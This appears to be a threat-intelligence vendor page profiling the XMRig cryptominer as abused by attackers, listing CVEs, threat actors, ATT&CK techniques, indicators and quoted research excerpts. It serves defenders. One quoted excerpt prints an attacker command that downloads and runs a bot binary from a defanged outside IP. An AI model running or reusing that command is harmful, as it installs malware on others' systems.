XMRig
XMRig is a high-performance, open-source, cross-platform cryptocurrency miner, most commonly used to mine Monero and frequently repurposed by threat actors as a cryptomining payload. The provided content explicitly describes it as supporting RandomX, KawPow, CryptoNight, and GhostRider CPU/GPU mining, and identifies observed malicious deployments as XMRig-based Monero miners, including versions 5.5.3, 6.18, and 6.24.0.
Across the cited incidents, XMRig was deployed on both Windows and Linux systems, including servers, containers, developer workstations, and compromised enterprise endpoints. Delivery vectors mentioned in the content include malicious VS Code extensions, PowerShell installers, staged malware chains, exploitation of internet-facing vulnerabilities such as VMware Workspace ONE Access/Identity Manager CVE-2022-22954, React2Shell/CVE-2025-55182, and DreamBus exploitation of Metabase CVE-2023-38646 and Apache RocketMQ CVE-2023-33246. It was also delivered through broader malware ecosystems and botnets including Prometei, Blackmoon/KRBanker, DDG.Mining.Botnet, V3G4, and campaigns abusing compromised software distribution pipelines.
Observed behavior in the content includes disabling or evading security controls, such as adding Windows Defender exclusions and disabling Windows Defender, Malwarebytes, and Sophos; persistence via Windows services, cron, systemd services, and autostart mechanisms; process killing to remove competing miners; and stealth measures such as renaming the miner to benign-looking filenames including nginx and WmiPrvSER.exe. Some campaigns used modified XMRig payloads, runtime-delivered configuration, or XMRig-based miners implemented in Go. Reported strings and artifacts include "killed orphan miner pid %d", "user active, stopping miner", "m/cmd/xmrig-idle", the mutex BaseNamedObjects\Win__Host, mining-pool-related connectivity such as us[.]zephyr[.]herominers[.]com, xmrig[.]com, pool.hashvault[.]pro:443, and www.chatgptaiweb[.]top:80, and a sample hash for an XMRig binary renamed as nginx with MD5 859fbbedefc95a90d243a0a9b92d1ae9.
The content associates XMRig deployment with multiple threat actors and clusters, including GREYVIBE, TeamPCP, and operators of DreamBus, Prometei, Blackmoon, DDG.Mining.Botnet, and React2Shell exploitation campaigns. Targeting described in the source material spans Ukraine-related military, government, civilian, and business entities; businesses in the United States and Canada; Russian insurance, e-commerce, and IT organizations; Linux servers and IoT devices; and victims of malicious developer tooling and supply-chain compromises. In several cases, XMRig was not the sole objective but part of post-compromise monetization alongside credential theft, lateral movement, botnet deployment, proxy infrastructure, or remote access tooling.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Vulnerabilities exploited
22 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
Ahnlab Security Emergency response Center (ASEC) has recently confirmed that the 8220 Gang attack group is using the Log4Shell vulnerability to install CoinMiner in VMware Horizon servers. Log4Shell (CVE-2021-44228) is both a remote code execution vulnerability and the Java-based logging utility Log4j vulnerability... | If the CVE-2022-26134 vulnerability attack succeeds, the following PowerShell command downloads and executes additional PowerShell scripts and ultimately installs XMRig CoinMiner.
The group targets not only global systems but also Korean ones. ASEC has introduced a case where the attack group abused the Atlassian Confluence server vulnerability CVE-2022-26134 to attack Korean systems and install CoinMiner. | If the CVE-2022-26134 vulnerability attack succeeds, the following PowerShell command downloads and executes additional PowerShell scripts and ultimately installs XMRig CoinMiner.
React2Shell in Russia: ... Most of the attacks deployed XMRig-based cryptominers.
In this cluster of activity, since at least March 25, 2026, an XMRig sample and its accompanying configuration file were downloaded and deployed via a shell script.
In this cluster of activity, since at least March 25, 2026, an XMRig sample and its accompanying configuration file were downloaded and deployed via a shell script.
In this cluster of activity, since at least March 25, 2026, an XMRig sample and its accompanying configuration file were downloaded and deployed via a shell script.
Several devices initiated TCP connections to endpoints affiliated with cryptomining pools such as us[.]zephyr[.]herominers[.]com and xmrig[.]com. Connectivity to these domains indicates likely successful installation of mining software during earlier stages of post-compromise activity.
Several devices initiated TCP connections to endpoints affiliated with cryptomining pools such as us[.]zephyr[.]herominers[.]com and xmrig[.]com. Connectivity to these domains indicates likely successful installation of mining software during earlier stages of post-compromise activity.
CVE-2022-22954, a remote code execution (RCE) vulnerability due to server-side template injection in VMware Workspace ONE Access and Identity Manager, is trivial to exploit with a single HTTP request to a vulnerable device.
Apache RocketMQ Exploit Module (CVE-2023-33246) ... In June 2023, a vulnerability cataloged as CVE-2023-33246 was discovered that enables an attacker to achieve remote command execution (RCE) on RocketMQ versions 5.1.0 and earlier. Shortly after, DreamBus added an exploit module to target this vulnerability.
Metabase Exploit Module (CVE-2023-38646) ... The open source versions of Metabase 0.46.6.1 and earlier, as well as Metabase Enterprise 1.46.6.1 and earlier, are vulnerable to CVE-2023-38646 ... The vulnerability allows an attacker to execute arbitrary commands on the server. The DreamBus exploit targeting the vulnerability is likely based on an open source proof-of-concept.
The attack, at its core, exploits a critical missing authentication bug (CVE-2023-48022, CVSS score: 9.8) to take control of susceptible instances and hijack their computing power for illicit cryptocurrency mining using XMRig.
CVE-2026-20182 carries a CVSSv3.1 score of 10.0 (Critical) and is classified under CWE-287: Improper Authentication. The flaw affects the Cisco Catalyst SD-WAN Controller (formerly vSmart)... The peering authentication mechanism is not functioning correctly, allowing an unauthenticated, remote attacker to bypass authentication and obtain administrative privileges on the affected system.
Apr 2024 PAN-OS CVE-2024-3400 exploit integration (Akamai)
Analysis of react.py This script is clearly set to exploit CVE-2025-29927, also known as React2Shell. ... This script implements a fully automated React/Next.js exploitation pipeline centered on abusing CVE-2025-29927 to achieve remote command execution at scale.
Malware campaigns include the Muhstik botnet and XMRig Monero Cryptocurrency mining. | Drupal versions before 7.58... allow remote attackers to execute arbitrary code... Malware campaigns include the Muhstik botnet and XMRig Monero Cryptocurrency mining.
The PoC repository contained a PDF file... downloading and running three files: Xsession.sh → The main malware script; xsession.auth → A disguised Monero miner (XMRig); xprintidle → A utility to detect when the system was idle. | Late at night, I was testing a proof-of-concept (PoC) exploit for CVE-2020-35489 ... The script appears to be a simple Proof-of-Concept (PoC) for an exploit, but in reality, it contains hidden malicious functionality.
“CoinMiner XMRig, a CoinMiner that mines the Monero cryptocurrency, was the one the most used in the attacks.”
"x522, which kills competing miners such as XMRig and Kinsing, and launches the miner with a c3pool.org configuration"
The Kaswara Modern WPBakery Page Builder plugin (CVE-2021-24284) is an example of this. This is a five-year-old unpatched flaw in a long-abandoned plugin that attackers are still actively exploiting right now... This flaw allows an unauthenticated attacker to upload malicious code directly to a vulnerable server and execute it remotely. | "...attackers have been using this vulnerability to take over WordPress websites... to ultimately install unauthorized copies of the XMRig cryptomining software"
The vulnerability, assigned the CVE identifier CVE-2024-4577, refers to an argument injection vulnerability in PHP affecting Windows-based systems running in CGI mode that could allow remote attackers to run arbitrary code.
The vulnerability in question is CVE-2025-32432 ... in Craft CMS
Groups observed using it
20 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
One of the campaigns deployed an XMRig cryptocurrency miner on a small number of infected machines, which is not standard behavior for a disciplined intelligence operation.
Impact T1496 Resource Hijacking TeamPCP kills competing XMRig cryptominers before deploying own payloads
If the CVE-2022-26134 vulnerability attack succeeds, the following PowerShell command downloads and executes additional PowerShell scripts and ultimately installs XMRig CoinMiner.
Cryptominer Deployment The platform deploys a custom cryptomining agent to compromised hosts... Architecture Component Detail Agent Binary multimmm-user (custom Go binary) Miner XMRig (Monero)
In one case, investigators detected the use of XMRig, a legitimate cryptocurrency mining tool, suggesting attackers may have used victims’ computing resources to generate digital currency.
XMRig is an open-source Monero mining application frequently abused by cybercriminals. TeamPCP deploys XMRig on compromised hosts to mine Monero using the victim’s CPU resources without authorization.
XMRig is an open-source Monero mining application frequently abused by cybercriminals. TeamPCP deploys XMRig on compromised hosts to mine Monero using the victim’s CPU resources without authorization.
XMRig is an open-source Monero mining application frequently abused by cybercriminals. TeamPCP deploys XMRig on compromised hosts to mine Monero using the victim’s CPU resources without authorization.
XMRig is an open-source Monero mining application frequently abused by cybercriminals. TeamPCP deploys XMRig on compromised hosts to mine Monero using the victim’s CPU resources without authorization.
CRYSTALRAY has two associated cryptominers... (IoCs include xmrig_arm64 and xmrig_freebsd binaries).
DreamBus botnet was observed leveraging an CVE-2023-33246 exploit to drop XMRig Monero miners on vulnerable servers.
Blue Mockingbird has executed custom-compiled XMRIG miner DLLs by configuring them to execute via the "wercplsupport" service.
It uses XMRig to mine for Monero and makes sure that it uses only 60% of the processing power to evade immediate detection.
“CoinMiner XMRig, a CoinMiner that mines the Monero cryptocurrency, was the one the most used in the attacks.”
"TsunamiHardener... sets up... Microsoft Defender exclusions for TsunamiClient and the XMRig miner"
The code references XMRig, an open-source tool commonly used to mine Monero (XMR), and several Rusich-linked addresses have received funds from mining pools.
The code references XMRig, an open-source tool commonly used to mine Monero (XMR), and several Rusich-linked addresses have received funds from mining pools.
Techniques & procedures
24 distinct techniques documented for this family, organized by ATT&CK tactic.
Resource Development
1 techniqueThe content repeatedly states that threat actors 'obtained,' 'acquired,' or 'used' publicly available, open-source, legitimate, or modified tools such as Mimikatz, Cobalt Strike, PsExec, Empire, Impacket, and many others.
Initial Access
1 techniqueПользователю показывалось сообщение, что версия плагина устарела и для продолжения просмотра необходимо установить обновление. После перехода по ссылке на устройство загружался ZIP-архив.
Execution
7 techniquesThe downloaded PowerShell scripts contain the functionality to disable Windows Defender, Malwarebytes and Sophos anti-malware software, to install modified XMRig cryptocurrency payload and download modules with the intention to steal user credentials from memory and use the credentials to attempt to spread laterally by passing the hash (Invoke-TheHash) through SMB or WMI.
The script also establishes persistence by creating... a Cron task... If executed without root privileges... adds it to both crontab (via @reboot) and .bashrc... EtherRAT establishes persistence through... crontab.
Overall, attackers can use LoLBins to: Download and install malicious code Executing malicious code... These campaigns can be relatively easily detected by internal hunting teams by analyzing command lines and their options.
Immediately after initial access, the attackers attempted to execute a PowerShell command to download a text file from a C2 server. The text file itself is a PowerShell script designed to install the XMRig cryptominer on the targeted system.
After compromising a host via the React2Shell vulnerability, threat actors executed the following commands inside a container: /bin/sh -c 'cd /tmp; wget hxxp://176.117.107[.]154/bot; chmod 777 bot; ./bot...'
CVE-2022-22954, a remote code execution (RCE) vulnerability due to server-side template injection in VMware Workspace ONE Access and Identity Manager, is trivial to exploit with a single HTTP request to a vulnerable device.
Актуальная версия загружаемого вредоносного ПО представляет собой ZIP-архив, содержащий легитимный .exe-файл и вредоносную DLL-библиотеку. При запуске исполняемого файла библиотека подгружается в его процесс, после чего начинается выполнение вредоносной логики.
Persistence
1 techniquePrivilege Escalation
4 techniquesThe script also establishes persistence by creating... a Cron task... If executed without root privileges... adds it to both crontab (via @reboot) and .bashrc... EtherRAT establishes persistence through... crontab.
В конце производятся четыре рефлективные загрузки: компоненты внедряются непосредственно в память целевых процессов без записи на диск... RAT agent → в conhost.exe; Watchdog → в explorer.exe; CPU-майнер → в explorer.exe; GPU-майнер → в explorer.exe.
The encrypted data is then converted into a base64 string, which is passed as a command-line parameter to launch the miner inside the explorer.exe process through process hollowing.
the threat actors used a container escape technique that leverages the CGroup release_agent feature. This technique allows an attacker to break out from the container and compromise the host
Stealth
5 techniquesThe Invoke-Obfuscation module is often used to create polymorphic obfuscated variants... The downloaded code is a reflective DLL loader with randomized function names to avoid simple pattern-based detection engines... This cryptocurrency miner had five deobfuscation stages.
Rather than embedding static configuration files, the malware fetches mining parameters dynamically from the C2 server at runtime... receiving a JSON blob containing wallet addresses, pool URLs, and algorithm settings without creating on-disk artifacts.
During the 2016 Ukraine Electric Power Attack, DLLs and EXEs with filenames associated with common electric power sector protocols were used to masquerade files.
В конце производятся четыре рефлективные загрузки: компоненты внедряются непосредственно в память целевых процессов без записи на диск... RAT agent → в conhost.exe; Watchdog → в explorer.exe; CPU-майнер → в explorer.exe; GPU-майнер → в explorer.exe.
Discovery
1 techniqueTo do this, it collects the following data from the victim’s device: Processor information The serial number of the C:/ drive Whether the process was launched with elevated privileges The process start time in Unix timestamp format
Lateral Movement
2 techniquesThe downloaded PowerShell scripts contain the functionality to disable Windows Defender, Malwarebytes and Sophos anti-malware software, to install modified XMRig cryptocurrency payload and download modules with the intention to steal user credentials from memory and use the credentials to attempt to spread laterally by passing the hash (Invoke-TheHash) through SMB or WMI.
The downloaded PowerShell scripts contain the functionality to disable Windows Defender, Malwarebytes and Sophos anti-malware software, to install modified XMRig cryptocurrency payload and download modules with the intention to steal user credentials from memory and use the credentials to attempt to spread laterally by passing the hash (Invoke-TheHash) through SMB or WMI.
Command and Control
3 techniquesthe bot performs multi-threaded DNS queries against Google’s public DNS server (8.8.8.8) to resolve the C2 domain baojunwakuang.asia, which maps to 159.75.47.123 and serves both botnet commands and miner configuration through non-standard ports like 60194
Subsequently, this script leverages multiple tool layers to fetch the primary execution bundle.
При этом домен {domain} вычисляется на основе текущей даты... Результатом хэширования является домен, с которым будет коммуницировать имплант.
Impact
2 techniquesThe alive.sh script... terminates any process consuming 40% CPU or more... The lived.sh script terminates... processes... identified as ELF executables... The downloaded executables... terminate all running processes except for xmrig.
This binary appears to be a crypto-miner... contains several strings relating to crypto-mining activity: “killed orphan miner pid %d” “user active, stopping miner” “m/cmd/xmrig-idle” (a Go module path indicating an XMRig-based miner)
Other
1 techniqueIOCs tracked for this family
278 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
Recent activity
200 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A crypto-miner component indicated by an xmrig-related Go module path; the analyzed binary appears to be XMRig-based, performs a Windows Defender exclusion, copies itself as HolaMonitorService.exe, and installs an autostart service that runs when the host is idle.
A cryptocurrency miner deployed on a limited number of infected systems as part of one GREYVIBE campaign.
A cryptocurrency miner deployed on a small subset of LegionRelay-infected systems, indicating overlap with cybercriminal monetization activity.
A miner payload deployed on a small number of LegionRelay-infected systems.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.